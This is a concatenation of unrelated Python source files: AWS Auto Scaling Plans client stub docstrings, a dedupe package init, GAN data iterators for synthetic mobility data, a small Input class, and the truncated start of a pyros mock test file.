StartTime=datetime(2015, 1, 1),
EndTime=datetime(2015, 1, 1)
)
**Response Syntax**
::
{
'Datapoints': [
{
'Timestamp': datetime(2015, 1, 1),
'Value': 123.0
},
]
}
**Response Structure**
- *(dict) --*
- **Datapoints** *(list) --*
The data points to return.
- *(dict) --*
Represents a single value in the forecast data used for predictive scaling.
- **Timestamp** *(datetime) --*
The time stamp for the data point in UTC format.
- **Value** *(float) --*
The value of the data point.
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:type ServiceNamespace: string
:param ServiceNamespace: **[REQUIRED]**
The namespace of the AWS service.
:type ResourceId: string
:param ResourceId: **[REQUIRED]**
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
:type ScalableDimension: string
:param ScalableDimension: **[REQUIRED]**
The scalable dimension for the resource.
:type ForecastDataType: string
:param ForecastDataType: **[REQUIRED]**
The type of forecast data to get.
* ``LoadForecast`` : The load metric forecast.
* ``CapacityForecast`` : The capacity forecast.
* ``ScheduledActionMinCapacity`` : The minimum capacity for each scheduled scaling action. This data is calculated as the larger of two values: the capacity forecast or the minimum capacity in the scaling instruction.
* ``ScheduledActionMaxCapacity`` : The maximum capacity for each scheduled scaling action. The calculation used is determined by the predictive scaling maximum capacity behavior setting in the scaling instruction.
:type StartTime: datetime
:param StartTime: **[REQUIRED]**
The inclusive start time of the time range for the forecast data to get. The date and time can be at most 56 days before the current date and time.
:type EndTime: datetime
:param EndTime: **[REQUIRED]**
The exclusive end time of the time range for the forecast data to get. The maximum time duration between the start and end time is seven days.
Although this parameter can accept a date and time that is more than two days in the future, the availability of forecast data has limits. AWS Auto Scaling only issues forecasts for periods of two days in advance.
:rtype: dict
:returns:
"""
pass
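The `StartTime`/`EndTime` parameters above carry two limits: the start can be at most 56 days in the past, and the window between start and end can span at most seven days. A small illustrative helper (not part of the SDK) that validates a window before querying:
```python
# Sketch: choose a StartTime/EndTime pair for
# get_scaling_plan_resource_forecast_data, enforcing the documented limits.
# The helper name is illustrative, not part of boto3.
from datetime import datetime, timedelta

def forecast_window(start, days):
    """Return (StartTime, EndTime) for a forecast query, enforcing the limits."""
    if days <= 0 or days > 7:
        raise ValueError("StartTime to EndTime may span at most seven days")
    if datetime.utcnow() - start > timedelta(days=56):
        raise ValueError("Data points are available for up to 56 days back")
    return start, start + timedelta(days=days)

# Example: a two-day window starting yesterday.
start, end = forecast_window(datetime.utcnow() - timedelta(days=1), 2)
```
The returned values can be passed directly as the ``StartTime`` and ``EndTime`` arguments.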
def get_waiter(self, waiter_name: str = None) -> Waiter:
"""
Returns an object that can wait for some condition.
:type waiter_name: str
:param waiter_name: The name of the waiter to get. See the waiters
section of the service docs for a list of available waiters.
:returns: The specified waiter object.
:rtype: botocore.waiter.Waiter
"""
pass
def update_scaling_plan(self, ScalingPlanName: str, ScalingPlanVersion: int, ApplicationSource: Dict = None, ScalingInstructions: List = None) -> Dict:
"""
Updates the specified scaling plan.
You cannot update a scaling plan if it is in the process of being created, updated, or deleted.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/autoscaling-plans-2018-01-06/UpdateScalingPlan>`_
**Request Syntax**
::
response = client.update_scaling_plan(
ScalingPlanName='string',
ScalingPlanVersion=123,
ApplicationSource={
'CloudFormationStackARN': 'string',
'TagFilters': [
{
'Key': 'string',
'Values': [
'string',
]
},
]
},
ScalingInstructions=[
{
'ServiceNamespace': 'autoscaling'|'ecs'|'ec2'|'rds'|'dynamodb',
'ResourceId': 'string',
'ScalableDimension': 'autoscaling:autoScalingGroup:DesiredCapacity'|'ecs:service:DesiredCount'|'ec2:spot-fleet-request:TargetCapacity'|'rds:cluster:ReadReplicaCount'|'dynamodb:table:ReadCapacityUnits'|'dynamodb:table:WriteCapacityUnits'|'dynamodb:index:ReadCapacityUnits'|'dynamodb:index:WriteCapacityUnits',
'MinCapacity': 123,
'MaxCapacity': 123,
'TargetTrackingConfigurations': [
{
'PredefinedScalingMetricSpecification': {
'PredefinedScalingMetricType': 'ASGAverageCPUUtilization'|'ASGAverageNetworkIn'|'ASGAverageNetworkOut'|'DynamoDBReadCapacityUtilization'|'DynamoDBWriteCapacityUtilization'|'ECSServiceAverageCPUUtilization'|'ECSServiceAverageMemoryUtilization'|'ALBRequestCountPerTarget'|'RDSReaderAverageCPUUtilization'|'RDSReaderAverageDatabaseConnections'|'EC2SpotFleetRequestAverageCPUUtilization'|'EC2SpotFleetRequestAverageNetworkIn'|'EC2SpotFleetRequestAverageNetworkOut',
'ResourceLabel': 'string'
},
'CustomizedScalingMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'TargetValue': 123.0,
'DisableScaleIn': True|False,
'ScaleOutCooldown': 123,
'ScaleInCooldown': 123,
'EstimatedInstanceWarmup': 123
},
],
'PredefinedLoadMetricSpecification': {
'PredefinedLoadMetricType': 'ASGTotalCPUUtilization'|'ASGTotalNetworkIn'|'ASGTotalNetworkOut'|'ALBTargetGroupRequestCount',
'ResourceLabel': 'string'
},
'CustomizedLoadMetricSpecification': {
'MetricName': 'string',
'Namespace': 'string',
'Dimensions': [
{
'Name': 'string',
'Value': 'string'
},
],
'Statistic': 'Average'|'Minimum'|'Maximum'|'SampleCount'|'Sum',
'Unit': 'string'
},
'ScheduledActionBufferTime': 123,
'PredictiveScalingMaxCapacityBehavior': 'SetForecastCapacityToMaxCapacity'|'SetMaxCapacityToForecastCapacity'|'SetMaxCapacityAboveForecastCapacity',
'PredictiveScalingMaxCapacityBuffer': 123,
'PredictiveScalingMode': 'ForecastAndScale'|'ForecastOnly',
'ScalingPolicyUpdateBehavior': 'KeepExternalPolicies'|'ReplaceExternalPolicies',
'DisableDynamicScaling': True|False
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
:type ScalingPlanName: string
:param ScalingPlanName: **[REQUIRED]**
The name of the scaling plan.
:type ScalingPlanVersion: integer
:param ScalingPlanVersion: **[REQUIRED]**
The version number of the scaling plan.
:type ApplicationSource: dict
:param ApplicationSource:
A CloudFormation stack or set of tags.
- **CloudFormationStackARN** *(string) --*
The Amazon Resource Name (ARN) of an AWS CloudFormation stack.
- **TagFilters** *(list) --*
A set of tags (up to 50).
- *(dict) --*
Represents a tag.
- **Key** *(string) --*
The tag key.
- **Values** *(list) --*
The tag values (0 to 20).
- *(string) --*
:type ScalingInstructions: list
:param ScalingInstructions:
The scaling instructions.
- *(dict) --*
Describes a scaling instruction for a scalable resource.
The scaling instruction is used in combination with a scaling plan, which is a set of instructions for configuring dynamic scaling and predictive scaling for the scalable resources in your application. Each scaling instruction applies to one resource.
AWS Auto Scaling creates target tracking scaling policies based on the scaling instructions. Target tracking scaling policies adjust the capacity of your scalable resource as required to maintain resource utilization at the target value that you specified.
AWS Auto Scaling also configures predictive scaling for your Amazon EC2 Auto Scaling groups using a subset of parameters, including the load metric, the scaling metric, the target value for the scaling metric, the predictive scaling mode (forecast and scale or forecast only), and the desired behavior when the forecast capacity exceeds the maximum capacity of the resource. With predictive scaling, AWS Auto Scaling generates forecasts with traffic predictions for the two days ahead and schedules scaling actions that proactively add and remove resource capacity to match the forecast.
We recommend waiting a minimum of 24 hours after creating an Auto Scaling group to configure predictive scaling. At minimum, there must be 24 hours of historical data to generate a forecast.
For more information, see `Getting Started with AWS Auto Scaling <https://docs.aws.amazon.com/autoscaling/plans/userguide/auto-scaling-getting-started.html>`__ .
- **ServiceNamespace** *(string) --* **[REQUIRED]**
The namespace of the AWS service.
- **ResourceId** *(string) --* **[REQUIRED]**
The ID of the resource. This string consists of the resource type and unique identifier.
* Auto Scaling group - The resource type is ``autoScalingGroup`` and the unique identifier is the name of the Auto Scaling group. Example: ``autoScalingGroup/my-asg`` .
* ECS service - The resource type is ``service`` and the unique identifier is the cluster name and service name. Example: ``service/default/sample-webapp`` .
* Spot Fleet request - The resource type is ``spot-fleet-request`` and the unique identifier is the Spot Fleet request ID. Example: ``spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE`` .
* DynamoDB table - The resource type is ``table`` and the unique identifier is the resource ID. Example: ``table/my-table`` .
* DynamoDB global secondary index - The resource type is ``index`` and the unique identifier is the resource ID. Example: ``table/my-table/index/my-table-index`` .
* Aurora DB cluster - The resource type is ``cluster`` and the unique identifier is the cluster name. Example: ``cluster:my-db-cluster`` .
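For illustration, the patterns above can be captured as plain strings (the resource names below are hypothetical, mirroring the examples):

```python
# Illustrative ResourceId strings, one per supported resource type.
# All resource names here are hypothetical placeholders.
resource_ids = {
    "autoscaling": "autoScalingGroup/my-asg",
    "ecs": "service/default/sample-webapp",
    "ec2": "spot-fleet-request/sfr-73fbd2ce-aa30-494c-8788-1cee4EXAMPLE",
    "dynamodb-table": "table/my-table",
    "dynamodb-index": "table/my-table/index/my-table-index",
    "rds": "cluster:my-db-cluster",  # note: Aurora clusters use ':' rather than '/'
}
```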
- **ScalableDimension** *(string) --* **[REQUIRED]**
The scalable dimension associated with the resource.
* ``autoscaling:autoScalingGroup:DesiredCapacity`` - The desired capacity of an Auto Scaling group.
* ``ecs:service:DesiredCount`` - The desired task count of an ECS service.
* ``ec2:spot-fleet-request:TargetCapacity`` - The target capacity of a Spot Fleet request.
* ``dynamodb:table:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB table.
* ``dynamodb:table:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB table.
* ``dynamodb:index:ReadCapacityUnits`` - The provisioned read capacity for a DynamoDB global secondary index.
* ``dynamodb:index:WriteCapacityUnits`` - The provisioned write capacity for a DynamoDB global secondary index.
* ``rds:cluster:ReadReplicaCount`` - The count of Aurora Replicas in an Aurora DB cluster. Available for Aurora MySQL-compatible edition and Aurora PostgreSQL-compatible edition.
- **MinCapacity** *(integer) --* **[REQUIRED]**
The minimum capacity of the resource.
- **MaxCapacity** *(integer) --* **[REQUIRED]**
The maximum capacity of the resource. The exception to this upper limit is if you specify a non-default setting for **PredictiveScalingMaxCapacityBehavior** .
- **TargetTrackingConfigurations** *(list) --* **[REQUIRED]**
The structure that defines new target tracking configurations (up to 10). Each of these structures includes a specific scaling metric and a target value for the metric, along with various parameters to use with dynamic scaling.
With predictive scaling and dynamic scaling, the resource scales based on the target tracking configuration that provides the largest capacity for both scale in and scale out.
Condition: The scaling metric must be unique across target tracking configurations.
- *(dict) --*
Describes a target tracking configuration to use with AWS Auto Scaling. Used with ScalingInstruction and ScalingPolicy.
- **PredefinedScalingMetricSpecification** *(dict) --*
A predefined metric. You can specify either a predefined metric or a customized metric.
- **PredefinedScalingMetricType** *(string) --* **[REQUIRED]**
The metric type. The ``ALBRequestCountPerTarget`` metric type applies only to Auto Scaling groups, Spot Fleet requests, and ECS services.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group, Spot Fleet request, or ECS service.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
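A quick sketch of deriving the resource label from the two ARNs; the ARNs below are made-up examples:

```python
# Build an ALBRequestCountPerTarget ResourceLabel from the load balancer ARN
# and the target group ARN. Both ARNs are hypothetical examples.
lb_arn = ("arn:aws:elasticloadbalancing:us-west-2:123456789012:"
          "loadbalancer/app/my-alb/778d41231b141a0f")
tg_arn = ("arn:aws:elasticloadbalancing:us-west-2:123456789012:"
          "targetgroup/my-targets/943f017f100becff")

lb_part = lb_arn.split(":loadbalancer/")[1]  # final portion of the LB ARN
tg_part = tg_arn.split(":")[-1]              # final portion of the target group ARN
resource_label = lb_part + "/" + tg_part
```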
- **CustomizedScalingMetricSpecification** *(dict) --*
A customized metric. You can specify either a predefined metric or a customized metric.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized scaling metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric.
- **Unit** *(string) --*
The unit of the metric.
- **TargetValue** *(float) --* **[REQUIRED]**
The target value for the metric. The range is 8.515920e-109 to 1.174271e+108 (Base 10) or 2e-360 to 2e360 (Base 2).
- **DisableScaleIn** *(boolean) --*
Indicates whether scale in by the target tracking scaling policy is disabled. If the value is ``true`` , scale in is disabled and the target tracking scaling policy doesn\'t remove capacity from the scalable resource. Otherwise, scale in is enabled and the target tracking scaling policy can remove capacity from the scalable resource.
The default value is ``false`` .
- **ScaleOutCooldown** *(integer) --*
The amount of time, in seconds, after a scale-out activity completes before another scale-out activity can start. This value is not used if the scalable resource is an Auto Scaling group.
While the cooldown period is in effect, the capacity that has been added by the previous scale-out event that initiated the cooldown is calculated as part of the desired capacity for the next scale out. The intention is to continuously (but not excessively) scale out.
- **ScaleInCooldown** *(integer) --*
The amount of time, in seconds, after a scale-in activity completes before another scale-in activity can start. This value is not used if the scalable resource is an Auto Scaling group.
The cooldown period is used to block subsequent scale-in requests until it has expired. The intention is to scale in conservatively to protect your application\'s availability. However, if another alarm triggers a scale-out policy during the cooldown period after a scale-in activity, AWS Auto Scaling scales out your scalable target immediately.
- **EstimatedInstanceWarmup** *(integer) --*
The estimated time, in seconds, until a newly launched instance can contribute to the CloudWatch metrics. This value is used only if the resource is an Auto Scaling group.
- **PredefinedLoadMetricSpecification** *(dict) --*
The predefined load metric to use for predictive scaling. This parameter or a **CustomizedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **PredefinedLoadMetricType** *(string) --* **[REQUIRED]**
The metric type.
- **ResourceLabel** *(string) --*
Identifies the resource associated with the metric type. You can\'t specify a resource label unless the metric type is ``ALBRequestCountPerTarget`` and there is a target group for an Application Load Balancer attached to the Auto Scaling group.
The format is app/<load-balancer-name>/<load-balancer-id>/targetgroup/<target-group-name>/<target-group-id>, where:
* app/<load-balancer-name>/<load-balancer-id> is the final portion of the load balancer ARN.
* targetgroup/<target-group-name>/<target-group-id> is the final portion of the target group ARN.
- **CustomizedLoadMetricSpecification** *(dict) --*
The customized load metric to use for predictive scaling. This parameter or a **PredefinedLoadMetricSpecification** is required when configuring predictive scaling, and cannot be used otherwise.
- **MetricName** *(string) --* **[REQUIRED]**
The name of the metric.
- **Namespace** *(string) --* **[REQUIRED]**
The namespace of the metric.
- **Dimensions** *(list) --*
The dimensions of the metric.
Conditional: If you published your metric with dimensions, you must specify the same dimensions in your customized load metric specification.
- *(dict) --*
Represents a dimension for a customized metric.
- **Name** *(string) --* **[REQUIRED]**
The name of the dimension.
- **Value** *(string) --* **[REQUIRED]**
The value of the dimension.
- **Statistic** *(string) --* **[REQUIRED]**
The statistic of the metric. Currently, the value must always be ``Sum`` .
- **Unit** *(string) --*
The unit of the metric.
- **ScheduledActionBufferTime** *(integer) --*
The amount of time, in seconds, to buffer the run time of scheduled scaling actions when scaling out. For example, if the forecast says to add capacity at 10:00 AM, and the buffer time is 5 minutes, then the run time of the corresponding scheduled scaling action will be 9:55 AM. The intention is to give resources time to be provisioned. For example, it can take a few minutes to launch an EC2 instance. The actual amount of time required depends on several factors, such as the size of the instance and whether there are startup scripts to complete.
The value must be less than the forecast interval duration of 3600 seconds (60 minutes). The default is 300 seconds.
Only valid when configuring predictive scaling.
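The buffering can be sketched with plain datetime arithmetic (the forecast time below is an arbitrary example):

```python
from datetime import datetime, timedelta

# The buffer shifts a forecast scale-out action earlier so capacity is
# ready on time. The date/time here is purely illustrative.
forecast_time = datetime(2023, 1, 1, 10, 0)  # forecast: add capacity at 10:00 AM
buffer_seconds = 300                         # the default buffer (5 minutes)
run_time = forecast_time - timedelta(seconds=buffer_seconds)
# run_time is 9:55 AM, giving instances time to launch before 10:00
```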
- **PredictiveScalingMaxCapacityBehavior** *(string) --*
Defines the behavior that should be applied if the forecast capacity approaches or exceeds the maximum capacity specified for the resource. The default value is ``SetForecastCapacityToMaxCapacity`` .
The following are possible values:
* ``SetForecastCapacityToMaxCapacity`` - AWS Auto Scaling cannot scale resource capacity higher than the maximum capacity. The maximum capacity is enforced as a hard limit.
* ``SetMaxCapacityToForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity to equal but not exceed forecast capacity.
* ``SetMaxCapacityAboveForecastCapacity`` - AWS Auto Scaling may scale resource capacity higher than the maximum capacity by a specified buffer value. The intention is to give the target tracking scaling policy extra capacity if unexpected traffic occurs.
Only valid when configuring predictive scaling.
- **PredictiveScalingMaxCapacityBuffer** *(integer) --*
The size of the capacity buffer to use when the forecast capacity is close to or exceeds the maximum capacity. The value is specified as a percentage relative to the forecast capacity. For example, if the buffer is 10, this means a 10 percent buffer, such that if the forecast capacity is 50, and the maximum capacity is 40, then the effective maximum capacity is 55.
Only valid when configuring predictive scaling. Required if the **PredictiveScalingMaxCapacityBehavior** is set to ``SetMaxCapacityAboveForecastCapacity`` , and cannot be used otherwise.
The range is 1-100.
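The interplay of the buffer with **PredictiveScalingMaxCapacityBehavior** can be sketched as follows; this is an interpretation of the documented example (buffer 10, forecast 50, maximum 40 gives an effective maximum of 55), not the service's actual algorithm:

```python
# Interpretation sketch of the three PredictiveScalingMaxCapacityBehavior values.
def effective_max_capacity(behavior, forecast, max_capacity, buffer_pct=0):
    if behavior == "SetForecastCapacityToMaxCapacity":
        return max_capacity                      # hard limit wins
    if behavior == "SetMaxCapacityToForecastCapacity":
        return max(max_capacity, forecast)       # max raised up to the forecast
    if behavior == "SetMaxCapacityAboveForecastCapacity":
        # the buffer is a percentage relative to the forecast capacity
        return max(max_capacity, forecast * (100 + buffer_pct) / 100.0)
    raise ValueError("unknown behavior: %s" % behavior)
```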
- **PredictiveScalingMode** *(string) --*
The predictive scaling mode. The default value is ``ForecastAndScale`` . If the mode is ``ForecastOnly`` , AWS Auto Scaling forecasts capacity but does not create any scheduled scaling actions based on the capacity forecast.
- **ScalingPolicyUpdateBehavior** *(string) --*
Controls whether a resource\'s externally created scaling policies are kept or replaced.
The default value is ``KeepExternalPolicies`` . If the parameter is set to ``ReplaceExternalPolicies`` , any scaling policies that are external to AWS Auto Scaling are deleted and new target tracking scaling policies created.
Only valid when configuring dynamic scaling.
Condition: The number of existing policies to be replaced must be less than or equal to 50. If there are more than 50 policies to be replaced, AWS Auto Scaling keeps all existing policies and does not create new ones.
- **DisableDynamicScaling** *(boolean) --*
Controls whether dynamic scaling by AWS Auto Scaling is disabled. When dynamic scaling is enabled, AWS Auto Scaling creates target tracking scaling policies based on the specified target tracking configurations.
The default is enabled (``false`` ).
:rtype: dict
:returns:
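As a sketch, the request might be assembled like this (assuming this syntax belongs to the ``autoscaling-plans`` client's ``update_scaling_plan`` operation; the plan name, capacities, and target value are all illustrative):

```python
# Hypothetical request for a CPU-tracking plan on an Auto Scaling group;
# `client` would be boto3.client('autoscaling-plans').
request = {
    "ScalingPlanName": "my-scaling-plan",
    "ScalingPlanVersion": 1,
    "ScalingInstructions": [{
        "ServiceNamespace": "autoscaling",
        "ResourceId": "autoScalingGroup/my-asg",
        "ScalableDimension": "autoscaling:autoScalingGroup:DesiredCapacity",
        "MinCapacity": 1,
        "MaxCapacity": 10,
        "TargetTrackingConfigurations": [{
            "PredefinedScalingMetricSpecification": {
                "PredefinedScalingMetricType": "ASGAverageCPUUtilization",
            },
            "TargetValue": 50.0,
        }],
    }],
}
# response = client.update_scaling_plan(**request)  # empty dict on success
```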
"""
pass
# File: dedupe/_init.py (repo: eig-2017/dedupe, MIT license)
from dedupe.api import StaticDedupe, Dedupe
from dedupe.api import StaticRecordLink, RecordLink
from dedupe.api import StaticGazetteer, Gazetteer
from dedupe.convenience import consoleLabel, trainingDataDedupe, trainingDataLink, canonicalize
# File: MoveSim/code/data_iter.py (repo: tobinsouth/privacy-preserving-synthetic-mobility-data, MIT license)
# -*- coding:utf-8 -*-
import os
import random
import math
import numpy as np
import torch
class GenDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, data_file, batch_size):
super(GenDataIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
d = [self.data_lis[i] for i in index]
d = torch.LongTensor(np.asarray(d, dtype='int64'))
data = torch.cat([torch.zeros(self.batch_size, 1).long(), d], dim=1)
target = torch.cat([d, torch.zeros(self.batch_size, 1).long()], dim=1)
self.idx += self.batch_size
return data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
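The `next()` method above prepends a zero "start" token to the input and appends a zero to the target, so the target is the input shifted left by one step (teacher forcing). With plain lists and a toy sequence:

```python
# Torch-free illustration of GenDataIter's data/target shift;
# `seq` is a hypothetical location sequence.
seq = [5, 9, 2]
data = [0] + seq      # model input:       [0, 5, 9, 2]
target = seq + [0]    # prediction target: [5, 9, 2, 0]
# target[t] is what the model should emit after reading data[:t + 1]
```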
class NewGenIter(object):
""" Toy data iter to load digits"""
def __init__(self, data_file, batch_size):
super(NewGenIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
d = [self.data_lis[i] for i in index]
d = np.asarray(d, dtype='int64')
data = torch.LongTensor(d[:, :-1])
target = torch.LongTensor(d[:, 1:])
self.idx += self.batch_size
return data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class DisDataIter(object):
""" Toy data iter to load digits"""
    def __init__(self, real_data_file, fake_data_file, batch_size, length):
        super(DisDataIter, self).__init__()
        self.batch_size = batch_size

        def extend_to_length(seqs):
            """Repeat or truncate each sequence to ``length`` steps.

            The branches assume 48-step input sequences. Lengths other than
            24/72/96/120/168 are passed through unchanged (the previous
            duplicated inline code raised a NameError in that case).
            """
            if len(seqs[0]) == length:
                return seqs
            if length == 24:
                return [t[0:24] for t in seqs]
            out = []
            for t in seqs:
                if length == 72:
                    t.extend(t[0:24])
                elif length == 96:
                    t.extend(t)
                elif length == 120:
                    t.extend(t)
                    t.extend(t[0:24])
                elif length == 168:
                    t.extend(t)
                    t.extend(t[0:48])
                    t.extend(t[0:24])
                out.append(t)
            return out

        real_data_lis = extend_to_length(self.read_file(real_data_file))
        fake_data_lis = extend_to_length(self.read_file(fake_data_file))
self.data = real_data_lis + fake_data_lis
self.labels = [1 for _ in range(len(real_data_lis))] + \
[0 for _ in range(len(fake_data_lis))]
self.pairs = list(zip(self.data, self.labels))
self.data_num = len(self.pairs)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.pairs)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
pairs = [self.pairs[i] for i in index]
data = [p[0] for p in pairs]
label = [p[1] for p in pairs]
data = torch.LongTensor(np.asarray(data, dtype='int64'))
label = torch.LongTensor(np.asarray(label, dtype='int64'))
self.idx += self.batch_size
return data, label
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
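The discriminator iterator above labels real sequences `1` and generated sequences `0`, then zips data and labels so shuffling keeps them aligned. A minimal torch-free sketch with toy sequences:

```python
# Toy version of DisDataIter's real/fake labelling; sequences are placeholders.
real = [[1, 2], [3, 4]]
fake = [[5, 6]]
data = real + fake
labels = [1] * len(real) + [0] * len(fake)   # 1 = real, 0 = generated
pairs = list(zip(data, labels))              # shuffled as pairs, labels stay aligned
```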
class TCGenDataIter(object):
"""data iterator with time context.
"""
def __init__(self, data_file, batch_size):
super(TCGenDataIter, self).__init__()
self.batch_size = batch_size
self.data_lis = self.read_file(data_file)
self.data_num = len(self.data_lis)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
        time_list = [23] + [i % 24 for i in range(48)]  # hour-of-day context: 23 for the start token, then 0..23 over the 48 steps
self.time = torch.stack(
[torch.ones(self.batch_size) * i for i in time_list], dim=1).long()
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.data_lis)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
d = [self.data_lis[i] for i in index]
d = torch.LongTensor(np.asarray(d, dtype='int64'))
data = torch.cat([torch.zeros(self.batch_size, 1).long(), d], dim=1)
target = torch.cat([d, torch.zeros(self.batch_size, 1).long()], dim=1)
self.idx += self.batch_size
return self.time, data, target
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
class TCDisDataIter(object):
""" Toy data iter to load digits"""
def __init__(self, real_data_file, fake_data_file, batch_size):
super(TCDisDataIter, self).__init__()
self.batch_size = batch_size
real_data_lis = self.read_file(real_data_file)
fake_data_lis = self.read_file(fake_data_file)
self.data = real_data_lis + fake_data_lis
self.labels = [1 for _ in range(len(real_data_lis))] + \
[0 for _ in range(len(fake_data_lis))]
self.pairs = list(zip(self.data, self.labels))
self.data_num = len(self.pairs)
self.indices = range(self.data_num)
self.num_batches = int(
math.ceil(float(self.data_num) / self.batch_size))
self.idx = 0
time_list = [i % 24 for i in range(48)]
self.time = torch.stack(
[torch.ones(self.batch_size) * i for i in time_list], dim=1).long()
def __len__(self):
return self.num_batches
def __iter__(self):
return self
def __next__(self):
return self.next()
def reset(self):
self.idx = 0
random.shuffle(self.pairs)
def next(self):
if self.idx >= self.data_num - self.batch_size:
raise StopIteration
index = self.indices[self.idx:self.idx + self.batch_size]
pairs = [self.pairs[i] for i in index]
data = [p[0] for p in pairs]
label = [p[1] for p in pairs]
data = torch.LongTensor(np.asarray(data, dtype='int64'))
label = torch.LongTensor(np.asarray(label, dtype='int64'))
self.idx += self.batch_size
return self.time, data, label
def read_file(self, data_file):
with open(data_file, 'r') as f:
lines = f.readlines()
lis = []
for line in lines:
l = line.strip().split(' ')
l = [int(s) for s in l]
lis.append(l)
return lis
# File: pyconsole/input/input.py (repo: Deployeur/PyConsole, MIT license)
class Input:
    def __init__(self, args=None):
        # avoid a mutable default argument: a shared dict would leak state
        # between Input instances
        self.args = args if args is not None else {}
def add(self, key, value):
self.args[key] = value
def get(self, key):
return self.args[key]
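A standalone usage sketch of the container; the class body is repeated here (with the keyword-default fix) so the example runs on its own:

```python
# Mirrors the Input class above so the snippet is self-contained.
class Input:
    def __init__(self, args=None):
        self.args = args if args is not None else {}

    def add(self, key, value):
        self.args[key] = value

    def get(self, key):
        return self.args[key]

inp = Input()
inp.add("name", "pyconsole")
print(inp.get("name"))  # prints: pyconsole
```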
# File: tests/test_pyros_interfaces_mock/test_pyros_mock.py (repo: pyros-dev/pyros-common, MIT license)
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
# This is needed if running this test directly (without using nose loader)
# prepending because ROS relies on package dirs list in PYTHONPATH and not isolated virtualenvs
# And we need our current module to be found first.
current_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
sys.path.insert(1, current_path)  # sys.path[0] is always current path as per python spec
import time
from pyros_interfaces_mock.mocksystem import (
mock_publisher_remote, mock_subscriber_remote, topics_available_remote, topics_available_type_remote,
)
